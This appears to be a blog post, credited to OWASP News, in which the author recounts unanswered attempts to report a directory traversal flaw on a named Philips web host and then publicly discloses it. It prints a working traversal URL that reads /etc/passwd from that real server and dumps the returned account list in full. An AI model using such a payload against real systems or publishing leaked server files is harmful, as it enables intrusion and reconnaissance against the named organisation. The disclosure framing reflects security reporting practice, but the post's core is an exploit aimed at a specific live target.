Writing about hacking and security isn't like anything else. It's cool and depressing, fun and dangerous at the same time. You'll never know what to expect. That's the beauty of it I guess. Since application hacking is quite well known by now, it depresses me very much to encounter things I am to speak about.

My first directory traversal was around 1999 when I more or less found myself intrigued by web applications and was pretty stunned that I could hack Cisco from a browser instead of a terminal. Imagine that you know, without any GNU/Linux skills running Netscape on some Windows box trying to proof-root Cisco and send them my findings. And guess what, they never replied back. Maybe the hole is still open after all these years, who knows. It's fair to conclude that programmers still suck at security and it's likely not going to change any time soon. But the biggest problem for hackers or security pentesters is the way they have to contact a company to notify them of their security issues. To be honest, I never got a honest mail back, from no-one besides a couple of threats. One of them was Bank Of America, who pulled the plug on this very website. But I guess that comes with the territory. In the real world everyone would be happy if your neighbors notify you, that you forgot your house keys on the outside of the front door. But no, not in Internet land.

A reader called haykuro, contacted me one month ago about a gaping hole on the Philips domain. A classic directory traversal vulnerability. While that wasn't enough, I tried to be an upstanding citizen and contacted Philips. Which turns out to be virtually impossible. They seem to have really good human resource firewalls, but lack proper application firewalls. They never got back to me even when I said that I will disclose it unto the net. So, one month later and it's still not fixed. I took a couple of hours to write mails back and forth, all in vain. Now I got only one thing to say: go suck on it!

Directory traversal:

http://www.trimension.philips.com/index.php?page=../../../../../../etc/passwd

Notice that the passwords are shadowed. At least they got that right. A shadowed password is indicated as an X. This means that the passwords aren't visible in the passwd file but reside in the shadow file. Nonetheless, you can obtain any file you want.

passwd file:

root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin 

daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin 

lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync 

shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt 

mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: 

uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:

/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin 

gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin

/nologin nobody:x:99:99:Nobody:/:/sbin/nologin vcsa:x:69:69:virtual console memory
 owner:/dev:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/sbin/nologin 

netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash nscd:x:28:28:NSCD 

Daemon:/:/sbin/nologin ident:x:100:101::/home/ident:/sbin/nologin 

sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin 

rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin rpcuser:x:29:29:RPC Service User:/var

/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:

/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var

/spool/mqueue:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin 

apache:x:48:48:Apache:/var/www:/bin/false ntp:x:38:38::/etc/ntp:/sbin/nologin 

administrator:x:201:201::/home/administrator:/bin/bash fhsvct:x:203:203::/home/fhsvcs:

/bin/false webstats:x:250:250::/var/ossec:/sbin/nologin

source: OWASP News